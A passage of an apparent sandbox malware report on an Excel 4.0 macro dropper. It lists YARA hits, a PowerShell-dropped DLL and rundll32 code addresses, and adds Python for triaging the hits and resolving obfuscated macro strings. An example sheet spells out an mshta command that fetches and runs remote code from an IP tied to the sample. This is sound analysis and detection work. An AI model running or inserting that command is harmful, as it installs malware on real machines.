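Source: Yara match File source: 00000009.00000002.491615915.0000000000240000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED
"""

LINE_RE = re.compile(r"^Source: Yara match File source: (?P<src>.+?), type: (?P<kind>\w+)$")
# <index>.<phase>.<process>.<base hex>.<n>[.raw].unpack
UNPACK_RE = re.compile(r"^(?P<pid>\d+)\.(?P<phase>\d+)\.(?P<proc>.+?)\.(?P<base>[0-9a-f]+)\.\d+\.(?:raw\.)?unpack$")
# <index hex>.<phase>.<seq>.<address>.<protection>.<state>.<type>.<extra>.sdmp
SDMP_RE = re.compile(r"^([0-9A-F]+)\.([0-9A-F]+)\.(\d+)\.([0-9A-F]+)\.([0-9A-F]+)\.([0-9A-F]+)\.([0-9A-F]+)\.([0-9A-F]+)\.sdmp$")


def parse_sources(lines):
    """Yield (kind, source) for every 'Yara match File source' line."""
    for line in lines.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m["kind"], m["src"]


def scope(lines):
    """Group hits by process index: unpacked image bases plus memory regions with protection/type."""
    procs = defaultdict(lambda: {"process": None, "unpacked": set(), "regions": {}})
    for kind, src in parse_sources(lines):
        if kind == "UNPACKEDPE" and (m := UNPACK_RE.match(src)):
            p = procs[int(m["pid"])]
            p["process"] = m["proc"]
            p["unpacked"].add(int(m["base"], 16))
        elif kind == "MEMORY" and (m := SDMP_RE.match(src)):
            p = procs[int(m[1], 16)]          # .sdmp index is hex, .unpack index is decimal
            p["regions"][int(m[4], 16)] = (int(m[5], 16), int(m[7], 16))
    summary = {}
    for pid, p in procs.items():
        regions = list(p["regions"].values())
        summary[pid] = {
            "process": p["process"],
            "unpacked": sorted(p["unpacked"]),
            # file-backed module image (here the DLL's own sections at 0x10001000)
            "image_regions": sorted(a for a, (_, t) in p["regions"].items() if t == MEM_IMAGE),
            # executable memory not backed by a file: unpacked or injected code
            "exec_private": any(prot & (PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE) and typ == MEM_PRIVATE
                                for prot, typ in regions),
            "rwx": any(prot == PAGE_EXECUTE_READWRITE for prot, _ in regions),
        }
    return summary


def dropped(lines):
    """Paths of files written to disk that matched the rule."""
    return [src for kind, src in parse_sources(lines) if kind == "DROPPED"]


if __name__ == "__main__":
    for pid, info in sorted(scope(YARA_LINES).items()):
        print(pid, info["process"], [hex(a) for a in info["unpacked"]],
              "exec_private" if info["exec_private"] else "", "rwx" if info["rwx"] else "")
    print("dropped:", dropped(YARA_LINES))
```

Run against the full list, the same grouping gives the set of rundll32.exe instances to scope in an incident and, per instance, the private executable regions a memory-forensics pass (a Volatility `malfind`-style sweep) should expect to find.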

System Summary

barindex
Source: 2022-28-01_1202.xls Macro extractor: Sheet: REEEEEEEE contains: mshta
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: 2022-28-01_1202.xls Stream path 'Workbook' : [binary BIFF Workbook stream; readable fragments: the user-name string "xXx" near the stream start (likely the BIFF WRITEACCESS last-author record), font table entries Calibri, Calibri Light and Arial, and the workbook's number-format strings]
Source: 2022-28-01_1202.xls.0.dr Stream path 'Workbook' : [the same stream in the copy re-saved during analysis; identical apart from the user-name string, which reads "user" (the sandbox account)]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Source: 2022-28-01_1202.xls Initial sample: EXEC
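The report's evidence for the macro is the two findings above: sheet REEEEEEEE references mshta, and the workbook calls EXEC. Excel 4.0 macro droppers of this kind typically keep the command line split across cells and `CHAR()` calls so that no single cell contains the string. The following is an added example, not part of the report or of the sample: a minimal resolver for that split-string pattern, which concatenates literals, `CHAR()` values and referenced cells and then checks the argument of the executing function for living-off-the-land binaries. The sheet cells are constructed to illustrate the pattern (the sample's real formulas are not on this page; the host and path reused from the HTTP traffic section are only an illustration), and the function and LOLBin watchlists are assumptions.

```python
import re

# Macro-sheet functions worth resolving: they launch code, load DLLs or rewrite
# other cells (assumed watchlist, not taken from the report).
SUSPICIOUS_FUNCS = {"EXEC", "CALL", "REGISTER", "FORMULA", "FORMULA.FILL"}
# Living-off-the-land binaries to look for in the resolved command line (assumed list).
LOLBINS = ("mshta", "powershell", "rundll32", "regsvr32", "certutil", "wscript", "cscript")

# Constructed sheet: the report only says sheet REEEEEEEE contains 'mshta' and
# that the workbook calls EXEC. These cells illustrate the split-string pattern
# and are not the sample's real formulas.
SHEET = {
    "A1": '="msh"',
    "A2": "=CHAR(116)&CHAR(97)",             # resolves to "ta"
    "A3": '=" http://"',
    "B1": '="91.240.118.172/gg/ff/fe.html"',  # host/path seen in the HTTP traffic section
    "C5": "=EXEC(A1&A2&A3&B1)",
    "C6": "=HALT()",
    "D1": "=SUM(1,2)",
}

# One XLM 'atom': a quoted literal, a CHAR(n) call, or an A1-style cell reference.
# The '&' operators between atoms are implied by the order of the atoms.
ATOM_RE = re.compile(r'"([^"]*)"|CHAR\((\d+)\)|\$?([A-Z]{1,3})\$?(\d+)')
# '=NAME(args)' at the top level of a cell.
FUNC_RE = re.compile(r"^=([A-Z.]+)\((.*)\)$")


def resolve(sheet, expr, depth=0):
    """Concatenate the atoms of an XLM string expression, following cell references."""
    if depth > 32:                          # stop runaway self-references
        return "<recursion limit>"
    out = []
    for lit, code, col, row in ATOM_RE.findall(expr):
        if code:
            out.append(chr(int(code)))
        elif col:
            target = sheet.get(col + row, "")
            out.append(resolve(sheet, target[1:], depth + 1) if target.startswith("=") else target)
        else:
            out.append(lit)
    return "".join(out)


def triage_sheet(sheet):
    """Return every cell that calls a suspicious function, with its resolved argument."""
    findings = []
    for cell, formula in sheet.items():
        m = FUNC_RE.match(formula)
        if not m or m[1] not in SUSPICIOUS_FUNCS:
            continue
        command = resolve(sheet, m[2])
        findings.append({
            "cell": cell,
            "function": m[1],
            "command": command,
            "lolbins": [b for b in LOLBINS if b in command.lower()],
        })
    return findings


if __name__ == "__main__":
    for f in triage_sheet(SHEET):
        print(f"{f['cell']}: {f['function']}({f['command']!r}) -> {f['lolbins']}")
```

The resolver deliberately handles only literals, `CHAR()` and cell references; arithmetic on character codes, `MID()`/`LEN()` slicing and `FORMULA()` cells that write other cells at run time need a real emulator, and for a sample like this one the sandbox's own behaviour (mshta spawned from Excel, as the Sigma hits in the overview record) is the ground truth to compare against.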
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037F8FD 9_2_0037F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037E991 9_2_0037E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037AB87 9_2_0037AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00379011 9_2_00379011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00380001 9_2_00380001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038907F 9_2_0038907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00372051 9_2_00372051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00390056 9_2_00390056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003820BA 9_2_003820BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003770B3 9_2_003770B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037F09B 9_2_0037F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00384116 9_2_00384116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003781B7 9_2_003781B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003751BB 9_2_003751BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00372251 9_2_00372251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038A2E8 9_2_0038A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037B2C7 9_2_0037B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037E2CC 9_2_0037E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00375361 9_2_00375361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00374346 9_2_00374346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003913AD 9_2_003913AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038C3A0 9_2_0038C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038E395 9_2_0038E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038D389 9_2_0038D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038F435 9_2_0038F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038044F 9_2_0038044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003764E2 9_2_003764E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00388519 9_2_00388519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037A55F 9_2_0037A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00382550 9_2_00382550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00375548 9_2_00375548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003895FA 9_2_003895FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037E5CF 9_2_0037E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038C631 9_2_0038C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00388606 9_2_00388606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038A666 9_2_0038A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037D6D8 9_2_0037D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003866CA 9_2_003866CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00377735 9_2_00377735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038473C 9_2_0038473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00379714 9_2_00379714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038176B 9_2_0038176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037B74D 9_2_0037B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00374816 9_2_00374816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00381889 9_2_00381889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00378969 9_2_00378969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038894B 9_2_0038894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003909B5 9_2_003909B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003759F2 9_2_003759F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038AA30 9_2_0038AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00371A56 9_2_00371A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037EA99 9_2_0037EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00378B3D 9_2_00378B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038BB23 9_2_0038BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00380B19 9_2_00380B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037BB7E 9_2_0037BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038CB5B 9_2_0038CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00387BA6 9_2_00387BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00379B83 9_2_00379B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00384B87 9_2_00384B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038DBEA 9_2_0038DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00388BE3 9_2_00388BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00372BD9 9_2_00372BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00389BCF 9_2_00389BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00377C37 9_2_00377C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038AC3A 9_2_0038AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00373C3C 9_2_00373C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00390C14 9_2_00390C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00374C5D 9_2_00374C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00386C49 9_2_00386C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038DCF7 9_2_0038DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00385CC4 9_2_00385CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00376D24 9_2_00376D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00386DF8 9_2_00386DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00387DD5 9_2_00387DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00379DCF 9_2_00379DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00390E3A 9_2_00390E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00373E3F 9_2_00373E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038BE27 9_2_0038BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038AE6D 9_2_0038AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00375E60 9_2_00375E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00380E53 9_2_00380E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037EE81 9_2_0037EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037AEFB 9_2_0037AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00389EEC 9_2_00389EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00374EE3 9_2_00374EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038DEDC 9_2_0038DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00390F33 9_2_00390F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037CF47 9_2_0037CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037DFF3 9_2_0037DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00377FF2 9_2_00377FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00373C3C 10_2_00373C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00379011 10_2_00379011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038044F 10_2_0038044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003820BA 10_2_003820BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037F8FD 10_2_0037F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037D6D8 10_2_0037D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00384116 10_2_00384116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003913AD 10_2_003913AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037AB87 10_2_0037AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003895FA 10_2_003895FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003759F2 10_2_003759F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00377FF2 10_2_00377FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00377C37 10_2_00377C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038AC3A 10_2_0038AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00390E3A 10_2_00390E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038AA30 10_2_0038AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00373E3F 10_2_00373E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038C631 10_2_0038C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038F435 10_2_0038F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038BE27 10_2_0038BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00374816 10_2_00374816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00390C14 10_2_00390C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00380001 10_2_00380001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00388606 10_2_00388606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038907F 10_2_0038907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038AE6D 10_2_0038AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00375E60 10_2_00375E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038A666 10_2_0038A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00371A56 10_2_00371A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00372051 10_2_00372051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00372251 10_2_00372251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00374C5D 10_2_00374C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00380E53 10_2_00380E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00390056 10_2_00390056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00386C49 10_2_00386C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003770B3 10_2_003770B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037F09B 10_2_0037F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037EA99 10_2_0037EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00381889 10_2_00381889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037EE81 10_2_0037EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037AEFB 10_2_0037AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038DCF7 10_2_0038DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038A2E8 10_2_0038A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00389EEC 10_2_00389EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00374EE3 10_2_00374EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003764E2 10_2_003764E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038DEDC 10_2_0038DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037B2C7 10_2_0037B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003866CA 10_2_003866CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037E2CC 10_2_0037E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00385CC4 10_2_00385CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00377735 10_2_00377735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038473C 10_2_0038473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00390F33 10_2_00390F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00378B3D 10_2_00378B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00376D24 10_2_00376D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038BB23 10_2_0038BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00388519 10_2_00388519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00380B19 10_2_00380B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00379714 10_2_00379714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037BB7E 10_2_0037BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038176B 10_2_0038176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00375361 10_2_00375361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00378969 10_2_00378969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038CB5B 10_2_0038CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037A55F 10_2_0037A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00382550 10_2_00382550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037CF47 10_2_0037CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00374346 10_2_00374346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038894B 10_2_0038894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037B74D 10_2_0037B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00375548 10_2_00375548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003781B7 10_2_003781B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003909B5 10_2_003909B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003751BB 10_2_003751BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038C3A0 10_2_0038C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00387BA6 10_2_00387BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037E991 10_2_0037E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038E395 10_2_0038E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038D389 10_2_0038D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00379B83 10_2_00379B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00384B87 10_2_00384B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00386DF8 10_2_00386DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037DFF3 10_2_0037DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038DBEA 10_2_0038DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00388BE3 10_2_00388BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00387DD5 10_2_00387DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00372BD9 10_2_00372BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00389BCF 10_2_00389BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00379DCF 10_2_00379DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037E5CF 10_2_0037E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036007 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041050 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003130F 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100323E2 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030460 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041592 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003E59F 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003960C 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100317E2 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10040B0E 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031BB6 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041C56 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036CB5 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001CD16 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10042D21 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031FC2 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027F8FD 11_2_0027F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027E991 11_2_0027E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027AB87 11_2_0027AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00280001 11_2_00280001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00279011 11_2_00279011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028907F 11_2_0028907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00272051 11_2_00272051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00290056 11_2_00290056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002820BA 11_2_002820BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002770B3 11_2_002770B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027F09B 11_2_0027F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00284116 11_2_00284116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002781B7 11_2_002781B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002751BB 11_2_002751BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00272251 11_2_00272251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028A2E8 11_2_0028A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027B2C7 11_2_0027B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027E2CC 11_2_0027E2CC
